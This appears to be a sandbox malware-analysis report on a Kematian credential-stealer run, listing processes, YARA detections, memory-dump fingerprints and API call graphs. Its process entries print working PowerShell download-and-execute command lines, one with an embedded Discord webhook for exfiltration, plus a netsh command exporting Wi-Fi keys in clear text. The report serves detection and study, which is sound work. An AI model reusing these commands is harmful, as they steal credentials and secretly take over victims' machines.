                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex
                                      Imagebase:0x7ff741d30000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Source: 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      Has exited:false

                                      Target ID:26
                                      Start time:12:08:25
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff75da10000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:27
                                      Start time:12:08:25
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                      Imagebase:0x7ff7b4ee0000
                                      File size:55'320 bytes
                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:28
                                      Start time:13:20:48
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                      Imagebase:0x7ff7fb730000
                                      File size:496'640 bytes
                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:30
                                      Start time:13:20:53
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\netsh.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user~1\AppData\Local\Temp\wifi key=clear
                                      Imagebase:0x7ff7e45d0000
                                      File size:96'768 bytes
                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:31
                                      Start time:13:20:55
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1'))
                                      Imagebase:0x7ff741d30000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:32
                                      Start time:13:20:58
                                      Start date:03/07/2024
                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline"
                                      Imagebase:0x7ff65f9f0000
                                      File size:2'759'232 bytes
                                      MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:33
                                      Start time:13:20:58
                                      Start date:03/07/2024
                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESA945.tmp" "c:\Users\user\AppData\Local\Temp\bekownh2\CSCE31222C310BD40CB8ED0AE4A3AB63C88.TMP"
                                      Imagebase:0x7ff6df720000
                                      File size:52'744 bytes
                                      MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:34
                                      Start time:13:21:08
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1'))
                                      Imagebase:0x7ff741d30000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:Go lang
                                      Yara matches:
                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000022.00000002.2017068494.000001DF1C3C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000022.00000002.1852694281.000001DF13ACC000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000022.00000002.1817228535.000001DF03E22000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000022.00000002.1852694281.000001DF13F87000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      Has exited:true

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1367756068.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7ffaac620000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a9a010883f1a6fe9fc1c7569250dc53987f1fee0a21ea36579a07c4dbc7757b4
                                        • Instruction ID: 42a168e95cf3f2a94a1414b829aa14a0e345e0f8dc4d5428d314e2e59f6daa94
                                        • Opcode Fuzzy Hash: a9a010883f1a6fe9fc1c7569250dc53987f1fee0a21ea36579a07c4dbc7757b4
                                        • Instruction Fuzzy Hash: 5131E97091CB488FDB1DDB5C9C466A97BE0FB99321F00422FE449D3252DB71A8568BC2
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1367756068.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7ffaac620000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1a78d73aa6a4252734054665c6f5302940ff8a5cf3a9c44e4be7cdd3402ec5b7
                                        • Instruction ID: 4b9ba1ff18726889df0367eb30ef4e4b573a5ca5d147e7a012b3cac2eea38853
                                        • Opcode Fuzzy Hash: 1a78d73aa6a4252734054665c6f5302940ff8a5cf3a9c44e4be7cdd3402ec5b7
                                        • Instruction Fuzzy Hash: D8210A3190C74C8FEB59DB9C984A7E97BE0EBA6321F04816BD049C3152DA74A45ACB91
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1367756068.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7ffaac620000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                        • Instruction ID: c98df3356cfbac9f5aaa3a9a1d60ee347b254d0bb7c6e02209e7f43d8b9b4b96
                                        • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                        Further functions with no API references and no meaningful string references were fingerprinted in these powershell memory dumps (their opcode and instruction fuzzy hashes are omitted here):
                                        • Source File: 0000000C.00000002.1367756068.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false (Snapshot File: hcaresult_12_2_7ffaac620000_powershell.jbxd)
                                        • Source File: 0000001F.00000002.1687583245.00007FFAAC500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC500000, based on PE: false (Snapshot File: hcaresult_31_2_7ffaac500000_powershell.jbxd)
                                        • Source File: 0000001F.00000002.1688314019.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false (Snapshot File: hcaresult_31_2_7ffaac5d0000_powershell.jbxd)

                                        Execution Graph

                                        Execution Coverage:1%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:56.5%
                                        Total number of Nodes:46
                                        Total number of Limit Nodes:12
                                        execution_graph (rendered graph omitted; node list reduced to its API calls): a routine at 7ffaac51ddbd calls CreateThread; routines at 1df1c78d4bf (NtCreateSection) and 1df1c78d4dc call NtMapViewOfSection, then NtUnmapViewOfSection and NtMapViewOfSection again, and reach LoadLibraryA through helper routines at 1df1c78e408, 1df1c78e4f0 and 1df1c78e1ac.

                                        Control-flow Graph

                                        control_flow_graph (rendered graph omitted): basic blocks 1df1c78d4bf through 1df1c78dea9 of the routine that calls NtCreateSection (block 1df1c78d4bf), NtMapViewOfSection (blocks 1df1c78d4d7 and 1df1c78da93) and NtUnmapViewOfSection (block 1df1c78da75), with internal calls to 1df1c78ec18, 1df1c78ec38, 1df1c78ec54, 1df1c78e408, 1df1c78e4f0, 1df1c78e1ac and 1df1c78c89c.
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000022.00000002.2017068494.000001DF1C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DF1C3C0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_34_2_1df1c3c0000_powershell.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Section$View$CreateUnmap
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000022.00000002.2017068494.000001DF1C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DF1C3C0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_34_2_1df1c3c0000_powershell.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: SectionView

                                        Control-flow Graph

                                        control_flow_graph (rendered graph omitted): basic blocks 1df1c78e408 through 1df1c78e4ec; the routine calls LoadLibraryA from block 1df1c78e4d1 and an internal routine at 1df1c78ec74.
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000022.00000002.2017068494.000001DF1C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DF1C3C0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_34_2_1df1c3c0000_powershell.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LibraryLoad

                                        Control-flow Graph

                                        control_flow_graph (rendered graph omitted): basic blocks 7ffaac51ddbd through 7ffaac51def1; CreateThread is called from block 7ffaac51ddf8.
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000022.00000002.2137329798.00007FFAAC510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_34_2_7ffaac510000_powershell.jbxd
                                        Similarity
                                        • API ID: CreateThread

                                        Control-flow Graph

                                        control_flow_graph (rendered graph omitted): basic blocks 7ffaac5e041d through 7ffaac5e07e0, with no API calls.
                                        Memory Dump Source
                                        • Source File: 00000022.00000002.2138935254.00007FFAAC5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_34_2_7ffaac5e0000_powershell.jbxd

                                        Control-flow Graph

                                        Memory Dump Source
                                        • Source File: 00000022.00000002.2138935254.00007FFAAC5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_34_2_7ffaac5e0000_powershell.jbxd

                                        Control-flow Graph

                                        control_flow_graph (rendered graph omitted): three basic blocks 1df1d2c7860 through 1df1d2c7e1e, the middle one (1df1d2c794d-1df1d2c7d2b) looping on itself; no API calls.
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000022.00000002.2094010428.000001DF1D2C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001DF1D2C1000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_34_2_1df1d2c1000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 2-by$expa$nd 3$te k
                                        • API String ID: 0-3581043453
                                        • Opcode ID: 9face80e684f4cb5f1989056d9a63c8b1ed90f8923185a9084afd145ce759664
                                        • Instruction ID: 2d5b7ae2bc73a75ad5455e3c1db5f3912dee661aad735c78aa7ebcf1a411cd23
                                        • Opcode Fuzzy Hash: 9face80e684f4cb5f1989056d9a63c8b1ed90f8923185a9084afd145ce759664
                                        • Instruction Fuzzy Hash: 8DC1532493AB4C1EE3C3BA298501253F344FE6E54DA20D366DE57B8491EB1FE88F610C
                                        Memory Dump Source
                                        • Source File: 00000022.00000002.2094010428.000001DF1D2C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001DF1D2C1000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_34_2_1df1d2c1000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d7deb9fe0b22ac6d43d1f22b99f431206e1cdecd252482b38c830d55032bd970
                                        • Instruction ID: 7ce0e9b55abf2c8f6b4acde36312dc77076acdfe4adea1430ce82e677323860b
                                        • Opcode Fuzzy Hash: d7deb9fe0b22ac6d43d1f22b99f431206e1cdecd252482b38c830d55032bd970
                                        • Instruction Fuzzy Hash: CAC0807181569959F351C75C4C403E47EE0D7D4351F44C0AED145C01D1D26D82C15144

                                        Control-flow Graph
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000022.00000002.2094010428.000001DF1D2C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001DF1D2C1000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_34_2_1df1d2c1000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: debu$debu$debu$debu$debu$l655$runt
                                        • API String ID: 0-120812121
                                        • Opcode ID: c56935a0eb90631a5f2efc0543069aa2723d47141d10be997a949776721356df
                                        • Instruction ID: da30d08f4427348e4158a09a7e98d5946da8289fa03f814b687fdcae3f290e1f
                                        • Opcode Fuzzy Hash: c56935a0eb90631a5f2efc0543069aa2723d47141d10be997a949776721356df
                                        • Instruction Fuzzy Hash: E9A19530544584CEEBA8FB1DC998BA476F1FB9A394F68C46EC41BC71E5D2A18E82D701